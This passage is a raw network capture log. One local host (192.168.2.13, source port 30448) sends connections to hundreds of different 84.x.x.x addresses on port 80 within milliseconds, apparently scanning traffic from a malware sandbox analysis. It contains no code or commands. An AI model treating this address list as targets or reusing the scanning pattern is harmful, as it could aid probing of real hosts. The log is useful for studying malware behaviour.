                                          Nov 7, 2024 11:58:00.438683987 CET3044880192.168.2.1384.56.192.28
                                          Nov 7, 2024 11:58:00.438688993 CET3044880192.168.2.1384.38.45.34
                                          Nov 7, 2024 11:58:00.438694000 CET3044880192.168.2.1384.248.235.71
                                          Nov 7, 2024 11:58:00.438694000 CET3044880192.168.2.1384.121.60.189
                                          Nov 7, 2024 11:58:00.438703060 CET3044880192.168.2.1384.90.113.163
                                          Nov 7, 2024 11:58:00.438703060 CET3044880192.168.2.1384.159.255.152
                                          Nov 7, 2024 11:58:00.438716888 CET3044880192.168.2.1384.211.23.243
                                          Nov 7, 2024 11:58:00.438716888 CET3044880192.168.2.1384.37.49.9
                                          Nov 7, 2024 11:58:00.438729048 CET3044880192.168.2.1384.110.228.20
                                          Nov 7, 2024 11:58:00.438729048 CET3044880192.168.2.1384.101.229.95
                                          Nov 7, 2024 11:58:00.438735008 CET3044880192.168.2.1384.157.87.55
                                          Nov 7, 2024 11:58:00.438749075 CET3044880192.168.2.1384.239.13.229
                                          Nov 7, 2024 11:58:00.438754082 CET3044880192.168.2.1384.129.10.101
                                          Nov 7, 2024 11:58:00.438756943 CET3044880192.168.2.1384.13.159.118
                                          Nov 7, 2024 11:58:00.438756943 CET3044880192.168.2.1384.26.66.92
                                          Nov 7, 2024 11:58:00.438761950 CET3044880192.168.2.1384.89.84.228
                                          Nov 7, 2024 11:58:00.438770056 CET3044880192.168.2.1384.113.64.2
                                          Nov 7, 2024 11:58:00.438776970 CET3044880192.168.2.1384.215.136.107
                                          Nov 7, 2024 11:58:00.438795090 CET3044880192.168.2.1384.88.237.80
                                          Nov 7, 2024 11:58:00.438795090 CET3044880192.168.2.1384.93.241.29
                                          Nov 7, 2024 11:58:00.438800097 CET3044880192.168.2.1384.190.237.221
                                          Nov 7, 2024 11:58:00.438807011 CET3044880192.168.2.1384.80.1.183
                                          Nov 7, 2024 11:58:00.438810110 CET3044880192.168.2.1384.196.44.211
                                          Nov 7, 2024 11:58:00.438815117 CET3044880192.168.2.1384.81.218.58
                                          Nov 7, 2024 11:58:00.438841105 CET3044880192.168.2.1384.224.134.94
                                          Nov 7, 2024 11:58:00.438841105 CET3044880192.168.2.1384.236.212.22
                                          Nov 7, 2024 11:58:00.438844919 CET3044880192.168.2.1384.235.179.194
                                          Nov 7, 2024 11:58:00.438844919 CET3044880192.168.2.1384.122.96.79
                                          Nov 7, 2024 11:58:00.438844919 CET3044880192.168.2.1384.157.255.143
                                          Nov 7, 2024 11:58:00.438863993 CET3044880192.168.2.1384.171.244.9
                                          Nov 7, 2024 11:58:00.438864946 CET3044880192.168.2.1384.182.183.169
                                          Nov 7, 2024 11:58:00.438874960 CET3044880192.168.2.1384.93.62.49
                                          Nov 7, 2024 11:58:00.438878059 CET3044880192.168.2.1384.20.234.244
                                          Nov 7, 2024 11:58:00.438879013 CET3044880192.168.2.1384.226.24.10
                                          Nov 7, 2024 11:58:00.438879967 CET3044880192.168.2.1384.12.170.210
                                          Nov 7, 2024 11:58:00.438882113 CET3044880192.168.2.1384.57.133.55
                                          Nov 7, 2024 11:58:00.438882113 CET3044880192.168.2.1384.123.254.146
                                          Nov 7, 2024 11:58:00.438893080 CET3044880192.168.2.1384.155.55.131
                                          Nov 7, 2024 11:58:00.438903093 CET3044880192.168.2.1384.246.141.60
                                          Nov 7, 2024 11:58:00.438905954 CET3044880192.168.2.1384.46.219.44
                                          Nov 7, 2024 11:58:00.438909054 CET3044880192.168.2.1384.73.224.169
                                          Nov 7, 2024 11:58:00.438911915 CET3044880192.168.2.1384.254.49.182
                                          Nov 7, 2024 11:58:00.438915014 CET3044880192.168.2.1384.76.27.1
                                          Nov 7, 2024 11:58:00.438916922 CET3044880192.168.2.1384.130.242.85
                                          Nov 7, 2024 11:58:00.438925982 CET3044880192.168.2.1384.151.61.127
                                          Nov 7, 2024 11:58:00.438942909 CET3044880192.168.2.1384.70.204.99
                                          Nov 7, 2024 11:58:00.438947916 CET3044880192.168.2.1384.9.197.170
                                          Nov 7, 2024 11:58:00.438947916 CET3044880192.168.2.1384.86.60.70
                                          Nov 7, 2024 11:58:00.438947916 CET3044880192.168.2.1384.167.32.137
                                          Nov 7, 2024 11:58:00.438947916 CET3044880192.168.2.1384.106.20.184
                                          Nov 7, 2024 11:58:00.438949108 CET3044880192.168.2.1384.70.11.76
                                          Nov 7, 2024 11:58:00.438965082 CET3044880192.168.2.1384.170.231.92
                                          Nov 7, 2024 11:58:00.438968897 CET3044880192.168.2.1384.209.62.132
                                          Nov 7, 2024 11:58:00.438972950 CET3044880192.168.2.1384.198.111.93
                                          Nov 7, 2024 11:58:00.438981056 CET3044880192.168.2.1384.237.159.9
                                          Nov 7, 2024 11:58:00.438990116 CET3044880192.168.2.1384.103.91.75
                                          Nov 7, 2024 11:58:00.438997030 CET3044880192.168.2.1384.12.153.174
                                          Nov 7, 2024 11:58:00.438997030 CET3044880192.168.2.1384.219.195.132
                                          Nov 7, 2024 11:58:00.439001083 CET3044880192.168.2.1384.9.116.186
                                          Nov 7, 2024 11:58:00.439001083 CET3044880192.168.2.1384.67.49.24
                                          Nov 7, 2024 11:58:00.439006090 CET3044880192.168.2.1384.212.71.17
                                          Nov 7, 2024 11:58:00.439011097 CET3044880192.168.2.1384.78.4.127
                                          Nov 7, 2024 11:58:00.439011097 CET3044880192.168.2.1384.5.224.29
                                          Nov 7, 2024 11:58:00.439022064 CET3044880192.168.2.1384.130.151.194
                                          Nov 7, 2024 11:58:00.439024925 CET3044880192.168.2.1384.221.184.131
                                          Nov 7, 2024 11:58:00.439028025 CET3044880192.168.2.1384.105.146.56
                                          Nov 7, 2024 11:58:00.439030886 CET3044880192.168.2.1384.5.171.206
                                          Nov 7, 2024 11:58:00.439043045 CET3044880192.168.2.1384.44.103.21
                                          Nov 7, 2024 11:58:00.439047098 CET3044880192.168.2.1384.137.131.174
                                          Nov 7, 2024 11:58:00.439058065 CET3044880192.168.2.1384.113.176.15
                                          Nov 7, 2024 11:58:00.439058065 CET3044880192.168.2.1384.118.231.164
                                          Nov 7, 2024 11:58:00.439059019 CET3044880192.168.2.1384.244.142.108
                                          Nov 7, 2024 11:58:00.439059973 CET3044880192.168.2.1384.53.172.27
                                          Nov 7, 2024 11:58:00.439076900 CET3044880192.168.2.1384.210.3.236
                                          Nov 7, 2024 11:58:00.439097881 CET3044880192.168.2.1384.205.97.73
                                          Nov 7, 2024 11:58:00.439097881 CET3044880192.168.2.1384.218.165.85
                                          Nov 7, 2024 11:58:00.439097881 CET3044880192.168.2.1384.55.219.159
                                          Nov 7, 2024 11:58:00.439102888 CET3044880192.168.2.1384.9.16.90
                                          Nov 7, 2024 11:58:00.439110041 CET3044880192.168.2.1384.103.216.198
                                          Nov 7, 2024 11:58:00.439110994 CET3044880192.168.2.1384.121.100.94
                                          Nov 7, 2024 11:58:00.439110994 CET3044880192.168.2.1384.189.163.139
                                          Nov 7, 2024 11:58:00.439119101 CET3044880192.168.2.1384.200.228.19
                                          Nov 7, 2024 11:58:00.439129114 CET3044880192.168.2.1384.10.193.118
                                          Nov 7, 2024 11:58:00.439129114 CET3044880192.168.2.1384.98.160.65
                                          Nov 7, 2024 11:58:00.439142942 CET3044880192.168.2.1384.162.167.3
                                          Nov 7, 2024 11:58:00.439146042 CET3044880192.168.2.1384.113.100.100
                                          Nov 7, 2024 11:58:00.439151049 CET3044880192.168.2.1384.188.166.175
                                          Nov 7, 2024 11:58:00.439152002 CET3044880192.168.2.1384.64.236.53
                                          Nov 7, 2024 11:58:00.439152002 CET3044880192.168.2.1384.25.192.98
                                          Nov 7, 2024 11:58:00.439156055 CET3044880192.168.2.1384.151.224.231
                                          Nov 7, 2024 11:58:00.439157009 CET3044880192.168.2.1384.112.236.146
                                          Nov 7, 2024 11:58:00.439157009 CET3044880192.168.2.1384.223.215.144
                                          Nov 7, 2024 11:58:00.439172029 CET3044880192.168.2.1384.176.55.128
                                          Nov 7, 2024 11:58:00.439172029 CET3044880192.168.2.1384.122.28.163
                                          Nov 7, 2024 11:58:00.439178944 CET3044880192.168.2.1384.138.32.202
                                          Nov 7, 2024 11:58:00.439181089 CET3044880192.168.2.1384.25.232.155
                                          Nov 7, 2024 11:58:00.439181089 CET3044880192.168.2.1384.22.126.188
                                          Nov 7, 2024 11:58:00.439199924 CET3044880192.168.2.1384.218.215.131
                                          Nov 7, 2024 11:58:00.439203024 CET3044880192.168.2.1384.253.183.182
                                          Nov 7, 2024 11:58:00.439203024 CET3044880192.168.2.1384.43.46.156
                                          Nov 7, 2024 11:58:00.439208984 CET3044880192.168.2.1384.158.197.169
                                          Nov 7, 2024 11:58:00.439208984 CET3044880192.168.2.1384.236.219.76
                                          Nov 7, 2024 11:58:00.439229012 CET3044880192.168.2.1384.71.162.210
                                          Nov 7, 2024 11:58:00.439229012 CET3044880192.168.2.1384.64.245.255
                                          Nov 7, 2024 11:58:00.439232111 CET3044880192.168.2.1384.202.70.254
                                          Nov 7, 2024 11:58:00.439243078 CET3044880192.168.2.1384.241.196.32
                                          Nov 7, 2024 11:58:00.439244032 CET3044880192.168.2.1384.186.67.41
                                          Nov 7, 2024 11:58:00.439246893 CET3044880192.168.2.1384.44.178.33
                                          Nov 7, 2024 11:58:00.439246893 CET3044880192.168.2.1384.193.226.96
                                          Nov 7, 2024 11:58:00.439250946 CET3044880192.168.2.1384.229.6.216
                                          Nov 7, 2024 11:58:00.439268112 CET3044880192.168.2.1384.192.117.242
                                          Nov 7, 2024 11:58:00.439268112 CET3044880192.168.2.1384.90.133.42
                                          Nov 7, 2024 11:58:00.439270020 CET3044880192.168.2.1384.253.94.240
                                          Nov 7, 2024 11:58:00.439270973 CET3044880192.168.2.1384.232.84.139
                                          Nov 7, 2024 11:58:00.439276934 CET3044880192.168.2.1384.63.164.191
                                          Nov 7, 2024 11:58:00.439279079 CET3044880192.168.2.1384.214.214.24
                                          Nov 7, 2024 11:58:00.439292908 CET3044880192.168.2.1384.9.190.245
                                          Nov 7, 2024 11:58:00.439292908 CET3044880192.168.2.1384.36.216.28
                                          Nov 7, 2024 11:58:00.439292908 CET3044880192.168.2.1384.67.63.14
                                          Nov 7, 2024 11:58:00.439294100 CET3044880192.168.2.1384.112.220.198
                                          Nov 7, 2024 11:58:00.439294100 CET3044880192.168.2.1384.83.115.176
                                          Nov 7, 2024 11:58:00.439294100 CET3044880192.168.2.1384.181.100.65
                                          Nov 7, 2024 11:58:00.439297915 CET3044880192.168.2.1384.153.55.57
                                          Nov 7, 2024 11:58:00.439297915 CET3044880192.168.2.1384.50.32.54
                                          Nov 7, 2024 11:58:00.439301968 CET3044880192.168.2.1384.220.150.168
                                          Nov 7, 2024 11:58:00.439317942 CET3044880192.168.2.1384.245.207.194
                                          Nov 7, 2024 11:58:00.439327002 CET3044880192.168.2.1384.192.125.243
                                          Nov 7, 2024 11:58:00.439328909 CET3044880192.168.2.1384.247.205.209
                                          Nov 7, 2024 11:58:00.439331055 CET3044880192.168.2.1384.144.68.229
                                          Nov 7, 2024 11:58:00.439346075 CET3044880192.168.2.1384.29.18.237
                                          Nov 7, 2024 11:58:00.439351082 CET3044880192.168.2.1384.178.238.130
                                          Nov 7, 2024 11:58:00.439361095 CET3044880192.168.2.1384.231.80.10
                                          Nov 7, 2024 11:58:00.439378023 CET3044880192.168.2.1384.21.158.120
                                          Nov 7, 2024 11:58:00.439378023 CET3044880192.168.2.1384.187.139.185
                                          Nov 7, 2024 11:58:00.439383030 CET3044880192.168.2.1384.131.182.219
                                          Nov 7, 2024 11:58:00.439383030 CET3044880192.168.2.1384.14.197.22
                                          Nov 7, 2024 11:58:00.439398050 CET3044880192.168.2.1384.201.71.161
                                          Nov 7, 2024 11:58:00.439398050 CET3044880192.168.2.1384.70.162.199
                                          Nov 7, 2024 11:58:00.439403057 CET3044880192.168.2.1384.91.87.154
                                          Nov 7, 2024 11:58:00.439403057 CET3044880192.168.2.1384.37.218.47
                                          Nov 7, 2024 11:58:00.439409971 CET3044880192.168.2.1384.175.109.237
                                          Nov 7, 2024 11:58:00.439409971 CET3044880192.168.2.1384.72.57.201
                                          Nov 7, 2024 11:58:00.439410925 CET3044880192.168.2.1384.129.144.238
                                          Nov 7, 2024 11:58:00.439410925 CET3044880192.168.2.1384.98.136.86
                                          Nov 7, 2024 11:58:00.439425945 CET3044880192.168.2.1384.0.35.255
                                          Nov 7, 2024 11:58:00.439430952 CET3044880192.168.2.1384.254.165.39
                                          Nov 7, 2024 11:58:00.439435005 CET3044880192.168.2.1384.228.219.157
                                          Nov 7, 2024 11:58:00.439439058 CET3044880192.168.2.1384.231.40.179
                                          Nov 7, 2024 11:58:00.439449072 CET3044880192.168.2.1384.8.105.223
                                          Nov 7, 2024 11:58:00.439449072 CET3044880192.168.2.1384.91.216.64
                                          Nov 7, 2024 11:58:00.439449072 CET3044880192.168.2.1384.168.213.102
                                          Nov 7, 2024 11:58:00.439464092 CET3044880192.168.2.1384.232.200.82
                                          Nov 7, 2024 11:58:00.439469099 CET3044880192.168.2.1384.148.13.161
                                          Nov 7, 2024 11:58:00.439470053 CET3044880192.168.2.1384.228.225.57
                                          Nov 7, 2024 11:58:00.439471006 CET3044880192.168.2.1384.62.171.89
                                          Nov 7, 2024 11:58:00.439480066 CET3044880192.168.2.1384.146.88.228
                                          Nov 7, 2024 11:58:00.439496040 CET3044880192.168.2.1384.10.110.7
                                          Nov 7, 2024 11:58:00.439497948 CET3044880192.168.2.1384.118.121.222
                                          Nov 7, 2024 11:58:00.439507961 CET3044880192.168.2.1384.131.206.101
                                          Nov 7, 2024 11:58:00.439510107 CET3044880192.168.2.1384.86.178.37
                                          Nov 7, 2024 11:58:00.439510107 CET3044880192.168.2.1384.230.236.62
                                          Nov 7, 2024 11:58:00.439517021 CET3044880192.168.2.1384.26.149.195
                                          Nov 7, 2024 11:58:00.439517021 CET3044880192.168.2.1384.48.16.235
                                          Nov 7, 2024 11:58:00.439517021 CET3044880192.168.2.1384.170.2.236
                                          Nov 7, 2024 11:58:00.439534903 CET3044880192.168.2.1384.126.92.204
                                          Nov 7, 2024 11:58:00.439544916 CET3044880192.168.2.1384.167.238.238
                                          Nov 7, 2024 11:58:00.439546108 CET3044880192.168.2.1384.119.48.7
                                          Nov 7, 2024 11:58:00.439546108 CET3044880192.168.2.1384.183.23.236
                                          Nov 7, 2024 11:58:00.439548016 CET3044880192.168.2.1384.120.20.44
                                          Nov 7, 2024 11:58:00.439551115 CET3044880192.168.2.1384.55.211.73
                                          Nov 7, 2024 11:58:00.439553976 CET3044880192.168.2.1384.255.144.40
                                          Nov 7, 2024 11:58:00.439553976 CET3044880192.168.2.1384.62.31.201
                                          Nov 7, 2024 11:58:00.439558029 CET3044880192.168.2.1384.32.131.135
                                          Nov 7, 2024 11:58:00.439558029 CET3044880192.168.2.1384.176.84.225
                                          Nov 7, 2024 11:58:00.439558029 CET3044880192.168.2.1384.147.19.104
                                          Nov 7, 2024 11:58:00.439563036 CET3044880192.168.2.1384.153.171.57
                                          Nov 7, 2024 11:58:00.439563036 CET3044880192.168.2.1384.222.159.122
                                          Nov 7, 2024 11:58:00.439570904 CET3044880192.168.2.1384.68.127.37
                                          Nov 7, 2024 11:58:00.439584017 CET3044880192.168.2.1384.56.104.170
                                          Nov 7, 2024 11:58:00.439584970 CET3044880192.168.2.1384.9.18.161
                                          Nov 7, 2024 11:58:00.439598083 CET3044880192.168.2.1384.35.193.163
                                          Nov 7, 2024 11:58:00.439598083 CET3044880192.168.2.1384.127.93.216
                                          Nov 7, 2024 11:58:00.439604998 CET3044880192.168.2.1384.165.147.117
                                          Nov 7, 2024 11:58:00.439604998 CET3044880192.168.2.1384.14.224.6
                                          Nov 7, 2024 11:58:00.439615965 CET3044880192.168.2.1384.86.35.99
                                          Nov 7, 2024 11:58:00.439616919 CET3044880192.168.2.1384.185.198.103
                                          Nov 7, 2024 11:58:00.439618111 CET3044880192.168.2.1384.220.189.88
                                          Nov 7, 2024 11:58:00.439620018 CET3044880192.168.2.1384.166.169.212
                                          Nov 7, 2024 11:58:00.439627886 CET3044880192.168.2.1384.179.51.204
                                          Nov 7, 2024 11:58:00.439630985 CET3044880192.168.2.1384.146.25.138
                                          Nov 7, 2024 11:58:00.439630985 CET3044880192.168.2.1384.8.233.12
                                          Nov 7, 2024 11:58:00.439632893 CET3044880192.168.2.1384.104.195.156
                                          Nov 7, 2024 11:58:00.439646006 CET3044880192.168.2.1384.246.102.4
                                          Nov 7, 2024 11:58:00.439659119 CET3044880192.168.2.1384.18.242.51
                                          Nov 7, 2024 11:58:00.439660072 CET3044880192.168.2.1384.90.29.62
                                          Nov 7, 2024 11:58:00.439686060 CET3044880192.168.2.1384.90.227.189
                                          Nov 7, 2024 11:58:00.439686060 CET3044880192.168.2.1384.200.134.8
                                          Nov 7, 2024 11:58:00.439686060 CET3044880192.168.2.1384.129.148.54
                                          Nov 7, 2024 11:58:00.439688921 CET3044880192.168.2.1384.176.246.40
                                          Nov 7, 2024 11:58:00.439702988 CET3044880192.168.2.1384.254.216.43
                                          Nov 7, 2024 11:58:00.439708948 CET3044880192.168.2.1384.211.249.202
                                          Nov 7, 2024 11:58:00.439708948 CET3044880192.168.2.1384.223.150.189
                                          Nov 7, 2024 11:58:00.439713955 CET3044880192.168.2.1384.121.3.47
                                          Nov 7, 2024 11:58:00.439713955 CET3044880192.168.2.1384.43.55.5
                                          Nov 7, 2024 11:58:00.439714909 CET3044880192.168.2.1384.26.82.193
                                          Nov 7, 2024 11:58:00.439722061 CET3044880192.168.2.1384.43.232.23
                                          Nov 7, 2024 11:58:00.439728975 CET3044880192.168.2.1384.145.53.255
                                          Nov 7, 2024 11:58:00.439743042 CET3044880192.168.2.1384.84.237.119
                                          Nov 7, 2024 11:58:00.439743042 CET3044880192.168.2.1384.104.191.32
                                          Nov 7, 2024 11:58:00.439758062 CET3044880192.168.2.1384.36.163.185
                                          Nov 7, 2024 11:58:00.439762115 CET3044880192.168.2.1384.249.131.117
                                          Nov 7, 2024 11:58:00.439763069 CET3044880192.168.2.1384.233.75.85
                                          Nov 7, 2024 11:58:00.439763069 CET3044880192.168.2.1384.225.71.166
                                          Nov 7, 2024 11:58:00.439763069 CET3044880192.168.2.1384.106.197.215
                                          Nov 7, 2024 11:58:00.439786911 CET3044880192.168.2.1384.81.197.4
                                          Nov 7, 2024 11:58:00.439790010 CET3044880192.168.2.1384.122.235.142
                                          Nov 7, 2024 11:58:00.439795971 CET3044880192.168.2.1384.159.138.41
                                          Nov 7, 2024 11:58:00.439795971 CET3044880192.168.2.1384.96.147.54
                                          Nov 7, 2024 11:58:00.439801931 CET3044880192.168.2.1384.220.0.171
                                          Nov 7, 2024 11:58:00.439804077 CET3044880192.168.2.1384.127.42.136
                                          Nov 7, 2024 11:58:00.439807892 CET3044880192.168.2.1384.70.31.10
                                          Nov 7, 2024 11:58:00.439809084 CET3044880192.168.2.1384.137.216.187
                                          Nov 7, 2024 11:58:00.439815998 CET3044880192.168.2.1384.246.3.253
                                          Nov 7, 2024 11:58:00.439822912 CET3044880192.168.2.1384.231.201.29
                                          Nov 7, 2024 11:58:00.439832926 CET3044880192.168.2.1384.254.47.23
                                          Nov 7, 2024 11:58:00.439846992 CET3044880192.168.2.1384.234.29.164
                                          Nov 7, 2024 11:58:00.439850092 CET3044880192.168.2.1384.37.164.46
                                          Nov 7, 2024 11:58:00.439851999 CET3044880192.168.2.1384.149.214.139
                                          Nov 7, 2024 11:58:00.439852953 CET3044880192.168.2.1384.55.73.98
                                          Nov 7, 2024 11:58:00.439851999 CET3044880192.168.2.1384.249.163.66
                                          Nov 7, 2024 11:58:00.439851999 CET3044880192.168.2.1384.202.62.244
                                          Nov 7, 2024 11:58:00.439872026 CET3044880192.168.2.1384.193.107.138
                                          Nov 7, 2024 11:58:00.439872980 CET3044880192.168.2.1384.19.194.150
                                          Nov 7, 2024 11:58:00.439898014 CET3044880192.168.2.1384.104.243.196
                                          Nov 7, 2024 11:58:00.439898014 CET3044880192.168.2.1384.198.0.88
                                          Nov 7, 2024 11:58:00.439898014 CET3044880192.168.2.1384.34.221.181
                                          Nov 7, 2024 11:58:00.439909935 CET3044880192.168.2.1384.177.117.126
                                          Nov 7, 2024 11:58:00.439915895 CET3044880192.168.2.1384.115.69.210
                                          Nov 7, 2024 11:58:00.439927101 CET3044880192.168.2.1384.124.3.235
                                          Nov 7, 2024 11:58:00.439934969 CET3044880192.168.2.1384.233.48.97
                                          Nov 7, 2024 11:58:00.439934969 CET3044880192.168.2.1384.23.95.201
                                          Nov 7, 2024 11:58:00.439934969 CET3044880192.168.2.1384.134.150.145
                                          Nov 7, 2024 11:58:00.439934969 CET3044880192.168.2.1384.226.114.18
                                          Nov 7, 2024 11:58:00.439934969 CET3044880192.168.2.1384.164.220.195
                                          Nov 7, 2024 11:58:00.439969063 CET3044880192.168.2.1384.25.149.34
                                          Nov 7, 2024 11:58:00.439974070 CET3044880192.168.2.1384.173.242.234
                                          Nov 7, 2024 11:58:00.439975023 CET3044880192.168.2.1384.239.235.18
                                          Nov 7, 2024 11:58:00.439980030 CET3044880192.168.2.1384.152.14.122
                                          Nov 7, 2024 11:58:00.439980984 CET3044880192.168.2.1384.72.124.210
                                          Nov 7, 2024 11:58:00.439980030 CET3044880192.168.2.1384.194.57.107
                                          Nov 7, 2024 11:58:00.439980984 CET3044880192.168.2.1384.64.219.234
                                          Nov 7, 2024 11:58:00.439984083 CET3044880192.168.2.1384.196.111.214
                                          Nov 7, 2024 11:58:00.439985037 CET3044880192.168.2.1384.124.116.140
                                          Nov 7, 2024 11:58:00.439985991 CET3044880192.168.2.1384.160.157.120
                                          Nov 7, 2024 11:58:00.439996958 CET3044880192.168.2.1384.246.213.174
                                          Nov 7, 2024 11:58:00.440002918 CET3044880192.168.2.1384.46.79.97
                                          Nov 7, 2024 11:58:00.440005064 CET3044880192.168.2.1384.1.110.253
                                          Nov 7, 2024 11:58:00.440023899 CET3044880192.168.2.1384.196.13.11
                                          Nov 7, 2024 11:58:00.440033913 CET3044880192.168.2.1384.215.133.48
                                          Nov 7, 2024 11:58:00.440038919 CET3044880192.168.2.1384.39.164.202
                                          Nov 7, 2024 11:58:00.440038919 CET3044880192.168.2.1384.57.152.0
                                          Nov 7, 2024 11:58:00.440042973 CET3044880192.168.2.1384.5.14.49
                                          Nov 7, 2024 11:58:00.440045118 CET3044880192.168.2.1384.137.167.100
                                          Nov 7, 2024 11:58:00.440045118 CET3044880192.168.2.1384.209.128.61
                                          Nov 7, 2024 11:58:00.440046072 CET3044880192.168.2.1384.228.22.116
                                          Nov 7, 2024 11:58:00.440045118 CET3044880192.168.2.1384.6.127.84
                                          Nov 7, 2024 11:58:00.440066099 CET3044880192.168.2.1384.214.193.32
                                          Nov 7, 2024 11:58:00.440073013 CET3044880192.168.2.1384.87.182.131
                                          Nov 7, 2024 11:58:00.440073013 CET3044880192.168.2.1384.238.149.221
                                          Nov 7, 2024 11:58:00.440073013 CET3044880192.168.2.1384.20.115.214
                                          Nov 7, 2024 11:58:00.440074921 CET3044880192.168.2.1384.145.196.104
                                          Nov 7, 2024 11:58:00.440073967 CET3044880192.168.2.1384.92.114.10
                                          Nov 7, 2024 11:58:00.440084934 CET3044880192.168.2.1384.175.83.186
                                          Nov 7, 2024 11:58:00.440090895 CET3044880192.168.2.1384.125.53.81
                                          Nov 7, 2024 11:58:00.440113068 CET3044880192.168.2.1384.63.187.53
                                          Nov 7, 2024 11:58:00.440114021 CET3044880192.168.2.1384.225.81.88
                                          Nov 7, 2024 11:58:00.440114021 CET3044880192.168.2.1384.230.61.191
                                          Nov 7, 2024 11:58:00.440114021 CET3044880192.168.2.1384.112.161.167
                                          Nov 7, 2024 11:58:00.440124035 CET3044880192.168.2.1384.13.9.117
                                          Nov 7, 2024 11:58:00.440124989 CET3044880192.168.2.1384.225.10.107
                                          Nov 7, 2024 11:58:00.440140963 CET3044880192.168.2.1384.21.253.43
                                          Nov 7, 2024 11:58:00.440143108 CET3044880192.168.2.1384.51.131.199
                                          Nov 7, 2024 11:58:00.440146923 CET3044880192.168.2.1384.212.223.193
                                          Nov 7, 2024 11:58:00.440146923 CET3044880192.168.2.1384.192.221.38
                                          Nov 7, 2024 11:58:00.440146923 CET3044880192.168.2.1384.91.96.230
                                          Nov 7, 2024 11:58:00.440155983 CET3044880192.168.2.1384.113.10.109
                                          Nov 7, 2024 11:58:00.440157890 CET3044880192.168.2.1384.127.20.52
                                          Nov 7, 2024 11:58:00.440159082 CET3044880192.168.2.1384.206.247.97
                                          Nov 7, 2024 11:58:00.440165043 CET3044880192.168.2.1384.29.140.90
                                          Nov 7, 2024 11:58:00.440171003 CET3044880192.168.2.1384.145.254.27
                                          Nov 7, 2024 11:58:00.440177917 CET3044880192.168.2.1384.55.23.146
                                          Nov 7, 2024 11:58:00.440197945 CET3044880192.168.2.1384.201.83.111
                                          Nov 7, 2024 11:58:00.440201044 CET3044880192.168.2.1384.147.17.114
                                          Nov 7, 2024 11:58:00.440203905 CET3044880192.168.2.1384.67.25.149
                                          Nov 7, 2024 11:58:00.440203905 CET3044880192.168.2.1384.88.185.46
                                          Nov 7, 2024 11:58:00.440203905 CET3044880192.168.2.1384.207.145.234
                                          Nov 7, 2024 11:58:00.440206051 CET3044880192.168.2.1384.187.213.67
                                          Nov 7, 2024 11:58:00.440206051 CET3044880192.168.2.1384.128.159.247
                                          Nov 7, 2024 11:58:00.440206051 CET3044880192.168.2.1384.203.14.74
                                          Nov 7, 2024 11:58:00.440207958 CET3044880192.168.2.1384.100.33.163
                                          Nov 7, 2024 11:58:00.440223932 CET3044880192.168.2.1384.169.90.89
                                          Nov 7, 2024 11:58:00.440227032 CET3044880192.168.2.1384.147.196.138
                                          Nov 7, 2024 11:58:00.440229893 CET3044880192.168.2.1384.62.69.215
                                          Nov 7, 2024 11:58:00.440233946 CET3044880192.168.2.1384.235.156.183
                                          Nov 7, 2024 11:58:00.440251112 CET3044880192.168.2.1384.167.251.87
                                          Nov 7, 2024 11:58:00.440256119 CET3044880192.168.2.1384.24.202.227
                                          Nov 7, 2024 11:58:00.440256119 CET3044880192.168.2.1384.113.31.161
                                          Nov 7, 2024 11:58:00.440256119 CET3044880192.168.2.1384.132.2.127
                                          Nov 7, 2024 11:58:00.440260887 CET3044880192.168.2.1384.135.204.242
                                          Nov 7, 2024 11:58:00.440263987 CET3044880192.168.2.1384.157.138.50
                                          Nov 7, 2024 11:58:00.440274000 CET3044880192.168.2.1384.74.31.233
                                          Nov 7, 2024 11:58:00.440274000 CET3044880192.168.2.1384.144.130.67
                                          Nov 7, 2024 11:58:00.440280914 CET3044880192.168.2.1384.227.200.2
                                          Nov 7, 2024 11:58:00.440284967 CET3044880192.168.2.1384.96.221.199
                                          Nov 7, 2024 11:58:00.440287113 CET3044880192.168.2.1384.116.16.91
                                          Nov 7, 2024 11:58:00.440287113 CET3044880192.168.2.1384.54.45.230
                                          Nov 7, 2024 11:58:00.440293074 CET3044880192.168.2.1384.82.179.21
                                          Nov 7, 2024 11:58:00.440294981 CET3044880192.168.2.1384.16.181.127
                                          Nov 7, 2024 11:58:00.440296888 CET3044880192.168.2.1384.106.63.189
                                          Nov 7, 2024 11:58:00.440313101 CET3044880192.168.2.1384.246.25.100
                                          Nov 7, 2024 11:58:00.440313101 CET3044880192.168.2.1384.242.227.186
                                          Nov 7, 2024 11:58:00.440334082 CET3044880192.168.2.1384.129.113.203
                                          Nov 7, 2024 11:58:00.440334082 CET3044880192.168.2.1384.200.202.206
                                          Nov 7, 2024 11:58:00.440341949 CET3044880192.168.2.1384.76.217.166
                                          Nov 7, 2024 11:58:00.440342903 CET3044880192.168.2.1384.8.81.36
                                          Nov 7, 2024 11:58:00.440341949 CET3044880192.168.2.1384.121.184.86
                                          Nov 7, 2024 11:58:00.440342903 CET3044880192.168.2.1384.30.153.156
                                          Nov 7, 2024 11:58:00.440377951 CET3044880192.168.2.1384.189.122.10
                                          Nov 7, 2024 11:58:00.440382004 CET3044880192.168.2.1384.34.176.30
                                          Nov 7, 2024 11:58:00.440387011 CET3044880192.168.2.1384.223.80.138
                                          Nov 7, 2024 11:58:00.440391064 CET3044880192.168.2.1384.55.185.95
                                          Nov 7, 2024 11:58:00.440391064 CET3044880192.168.2.1384.90.93.12
                                          Nov 7, 2024 11:58:00.440397024 CET3044880192.168.2.1384.159.106.196
                                          Nov 7, 2024 11:58:00.440401077 CET3044880192.168.2.1384.223.95.223
                                          Nov 7, 2024 11:58:00.440401077 CET3044880192.168.2.1384.228.54.95
                                          Nov 7, 2024 11:58:00.440407991 CET3044880192.168.2.1384.248.244.119
                                          Nov 7, 2024 11:58:00.440407991 CET3044880192.168.2.1384.1.17.251
                                          Nov 7, 2024 11:58:00.440407991 CET3044880192.168.2.1384.151.78.85
                                          Nov 7, 2024 11:58:00.440408945 CET3044880192.168.2.1384.53.8.63
                                          Nov 7, 2024 11:58:00.440407991 CET3044880192.168.2.1384.22.240.95
                                          Nov 7, 2024 11:58:00.440408945 CET3044880192.168.2.1384.41.253.223
                                          Nov 7, 2024 11:58:00.440408945 CET3044880192.168.2.1384.89.149.64
                                          Nov 7, 2024 11:58:00.440424919 CET3044880192.168.2.1384.137.172.108
                                          Nov 7, 2024 11:58:00.440426111 CET3044880192.168.2.1384.246.221.195
                                          Nov 7, 2024 11:58:00.440428019 CET3044880192.168.2.1384.13.93.193
                                          Nov 7, 2024 11:58:00.440428019 CET3044880192.168.2.1384.154.148.42
                                          Nov 7, 2024 11:58:00.440438032 CET3044880192.168.2.1384.245.55.52
                                          Nov 7, 2024 11:58:00.440439939 CET3044880192.168.2.1384.104.82.202
